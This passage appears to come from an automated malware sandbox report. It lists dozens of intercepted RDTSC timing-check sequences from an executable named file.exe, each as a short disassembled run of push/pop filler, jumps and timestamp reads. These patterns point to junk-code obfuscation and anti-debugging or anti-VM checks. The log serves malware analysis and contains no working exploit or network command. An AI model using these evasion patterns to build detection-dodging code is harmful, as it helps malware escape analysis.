Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA197 second address: 11CA1C1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F626C9C9A32h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F626C9C9A2Ah 0x00000011 jl 00007F626C9C9A3Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA1C1 second address: 11CA1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626D6E9A6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD346 second address: 11CD379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 jg 00007F626C9C9A26h 0x0000000d popad 0x0000000e jns 00007F626C9C9A2Ch 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jno 00007F626C9C9A32h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD379 second address: 11CD383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F626D6E9A66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD383 second address: 11CD387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD387 second address: 11CD392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD656 second address: 11CD660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CD660 second address: 11CD666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDADC second address: 11CDAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDAE0 second address: 11CDAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDAE6 second address: 11CDB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626C9C9A36h 0x00000009 jmp 00007F626C9C9A34h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDB14 second address: 11CDB37 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F626D6E9A81h 0x00000012 jmp 00007F626D6E9A6Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDC96 second address: 11CDCA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDCA1 second address: 11CDCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F626D6E9A6Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F626D6E9A66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDCBF second address: 11CDCC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CDCC5 second address: 11CDCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F626D6E9A66h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CF68D second address: 11CF691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D4E5D second address: 11D4E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D4E64 second address: 11D4E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D4E6A second address: 11D4E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3998 second address: 11D39A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626C9C9A26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D39A6 second address: 11D39AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3CA2 second address: 11D3CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3CA6 second address: 11D3CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F626D6E9A71h 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3CC3 second address: 11D3CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3CC7 second address: 11D3CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3CCB second address: 11D3CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11832D8 second address: 1183347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F626D6E9A68h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007F626D6E9A70h 0x0000002c xor dword ptr [ebp+12461D1Bh], ebx 0x00000032 pop edx 0x00000033 mov dword ptr [ebp+122D265Ch], edx 0x00000039 push esi 0x0000003a or dword ptr [ebp+122D17E0h], esi 0x00000040 pop ecx 0x00000041 push 00000004h 0x00000043 mov dword ptr [ebp+122D2FA7h], edi 0x00000049 jmp 00007F626D6E9A6Ch 0x0000004e push eax 0x0000004f push ecx 0x00000050 js 00007F626D6E9A6Ch 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D4B4C second address: 11D4B58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D4B58 second address: 11D4B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC596 second address: 11DC5A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F626C9C9A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC5A0 second address: 11DC5BF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F626D6E9A79h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC5BF second address: 11DC5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC5C5 second address: 11DC5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DA4E7 second address: 11DA4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DA4EB second address: 11DA4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DAD73 second address: 11DAD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DAD79 second address: 11DADCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F626D6E9A78h 0x0000000b jg 00007F626D6E9A66h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 jmp 00007F626D6E9A78h 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F626D6E9A66h 0x00000021 jmp 00007F626D6E9A6Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DADCA second address: 11DADCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DB366 second address: 11DB36B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DB671 second address: 11DB675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DB675 second address: 11DB679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DB679 second address: 11DB687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F626C9C9A28h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DB687 second address: 11DB6A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626D6E9A79h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DB9B0 second address: 11DB9C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F626C9C9A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC27B second address: 11DC280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC280 second address: 11DC294 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F626C9C9A26h 0x00000009 jnl 00007F626C9C9A26h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC294 second address: 11DC298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E028D second address: 11E0291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0414 second address: 11E042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626D6E9A75h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E042F second address: 11E0448 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626C9C9A26h 0x00000008 jg 00007F626C9C9A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jno 00007F626C9C9A26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0589 second address: 11E058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E058E second address: 11E0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0594 second address: 11E0598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0598 second address: 11E05C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A39h 0x00000007 jo 00007F626C9C9A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F626C9C9A2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E08CD second address: 11E08ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F626D6E9A7Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E7011 second address: 11E7017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E7017 second address: 11E705B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jno 00007F626D6E9A72h 0x00000012 jmp 00007F626D6E9A72h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F626D6E9A72h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E705B second address: 11E705F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E705F second address: 11E7065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EDF01 second address: 11EDF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626C9C9A2Eh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F626C9C9A2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE319 second address: 11EE31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE31D second address: 11EE321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE321 second address: 11EE35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626D6E9A70h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F626D6E9A76h 0x00000013 ja 00007F626D6E9A66h 0x00000019 jp 00007F626D6E9A66h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE35E second address: 11EE367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EEFE7 second address: 11EEFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F626D6E9A68h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EEFF4 second address: 11EEFFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626C9C9A2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EEFFE second address: 11EF026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F626D6E9A76h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push edx 0x0000000f jc 00007F626D6E9A66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED68E second address: 11ED694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED694 second address: 11ED69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED69A second address: 11ED69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5B5B second address: 11F5B88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jns 00007F626D6E9A68h 0x00000010 jmp 00007F626D6E9A78h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1202423 second address: 1202433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jg 00007F626C9C9A26h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137A34 second address: 1137A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137A3C second address: 1137A43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12130E8 second address: 12130EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12130EE second address: 1213101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626C9C9A2Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213101 second address: 1213105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213105 second address: 1213126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F626C9C9A35h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1213126 second address: 121312A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12198DF second address: 12198E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12198E5 second address: 121990D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F626D6E9A75h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F626D6E9A66h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1220899 second address: 12208AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1220D28 second address: 1220D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F626D6E9A66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1220D33 second address: 1220D51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F626C9C9A2Fh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F626C9C9A26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1220D51 second address: 1220D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1221933 second address: 1221976 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F626C9C9A26h 0x00000008 jnc 00007F626C9C9A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F626C9C9A30h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a jg 00007F626C9C9A26h 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F626C9C9A31h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1221976 second address: 122197A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1226B0F second address: 1226B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1226C91 second address: 1226C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1226C95 second address: 1226CDD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626C9C9A37h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F626C9C9A30h 0x00000011 jmp 00007F626C9C9A38h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1226CDD second address: 1226CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122EE66 second address: 122EEA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F626C9C9A31h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F626C9C9A30h 0x00000015 jmp 00007F626C9C9A2Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124302F second address: 1243035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245D27 second address: 1245D3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F626C9C9A2Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245D3B second address: 1245D65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F626D6E9A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F626D6E9A66h 0x00000017 jmp 00007F626D6E9A73h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1245D65 second address: 1245D7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
